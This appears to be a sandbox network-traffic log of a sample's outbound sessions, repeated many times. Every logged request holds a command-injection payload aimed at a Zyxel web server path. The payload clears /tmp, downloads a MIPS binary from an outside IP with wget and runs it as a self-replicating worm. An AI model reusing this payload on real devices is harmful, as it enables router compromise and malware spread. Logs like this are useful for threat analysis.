                                        Mar 31, 2024 09:21:49.219364882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5870192.168.2.235685452.173.68.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.219459057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5871192.168.2.233755851.213.178.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.219506025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5872192.168.2.2352368138.114.189.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.219578981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5873192.168.2.236017087.145.192.167443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.219656944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5874192.168.2.2347342202.10.213.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.219722033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5875192.168.2.2338876185.45.194.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.219768047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5876192.168.2.2344526164.84.133.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.219842911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5877192.168.2.233906259.232.97.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.219929934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5878192.168.2.233409073.76.180.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.220006943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5879192.168.2.2335798153.227.101.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.220057964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5880192.168.2.235402634.11.178.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.220144033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5881192.168.2.2353710184.231.235.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.220190048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5882192.168.2.234968620.78.78.101443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.220273972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5883192.168.2.234405472.148.57.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.220333099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5884192.168.2.2341582199.122.123.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.220383883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5885192.168.2.2360996115.129.217.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.220444918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5886192.168.2.233869842.232.39.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.220532894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5887192.168.2.234764027.171.43.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.220592022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5888192.168.2.2338340148.95.149.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.220649004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5889192.168.2.234823893.85.61.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.220726013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5890192.168.2.2340668162.243.131.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.220792055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5891192.168.2.235393871.160.129.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.220859051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5892192.168.2.2353568155.104.62.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.220940113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5893192.168.2.235025665.208.9.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.221028090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5894192.168.2.2337596144.195.4.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.221079111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5895192.168.2.233712058.106.100.110443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.221158028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5896192.168.2.2336548135.151.49.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.221245050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5897192.168.2.233907085.146.202.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.221328020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5898192.168.2.2342488146.76.28.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.221384048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5899192.168.2.234303032.117.129.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.221446991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5900192.168.2.2348012222.219.45.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.221534967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5901192.168.2.2332814126.81.255.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.221617937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5902192.168.2.2354760167.67.41.14443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.221683025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5903192.168.2.2356038201.136.2.220443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.221761942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5904192.168.2.2341894201.199.201.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.221822977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5905192.168.2.2354094194.75.160.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.221883059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5906192.168.2.2360122149.34.1.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.221956015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5907192.168.2.2350416170.236.139.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.222026110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5908192.168.2.2344430103.144.250.232443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.222091913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5909192.168.2.233329251.246.188.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.222161055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5910192.168.2.2355790168.220.49.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.222235918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5911192.168.2.234252263.177.165.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.222294092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5912192.168.2.234619860.118.145.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.222395897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5913192.168.2.233483074.235.60.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.222466946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5914192.168.2.234449257.120.40.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.222543001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5915192.168.2.235271672.93.235.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.222601891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5916192.168.2.234908062.144.221.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.222697020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5917192.168.2.2343718211.167.132.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.222750902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5918192.168.2.2334696185.98.214.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.222815037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5919192.168.2.234032432.199.52.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.222886086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5920192.168.2.2339494109.252.145.236443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.222971916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5921192.168.2.2360702108.201.155.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.223037004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5922192.168.2.23422844.94.209.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.223084927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5923192.168.2.234485831.247.176.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.223155975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5924192.168.2.2345876183.5.64.52443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.223220110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5925192.168.2.234874613.50.29.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.223293066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5926192.168.2.233331885.117.1.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.223361969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5927192.168.2.2348756177.203.51.243443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.223424911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5928192.168.2.235752412.24.231.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.223484039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5929192.168.2.235861490.165.112.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.223562002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5930192.168.2.235953681.75.4.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.223630905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5931192.168.2.235463037.229.5.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.223695040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5932192.168.2.233892276.99.141.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.223772049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5933192.168.2.234095496.154.189.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.223845959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5934192.168.2.2355996100.166.120.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.223907948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5935192.168.2.2334066135.72.3.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.223985910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5936192.168.2.2343126168.24.49.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:49.224035025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5937192.168.2.233526682.120.47.32443
                                        TimestampBytes transferredDirectionData
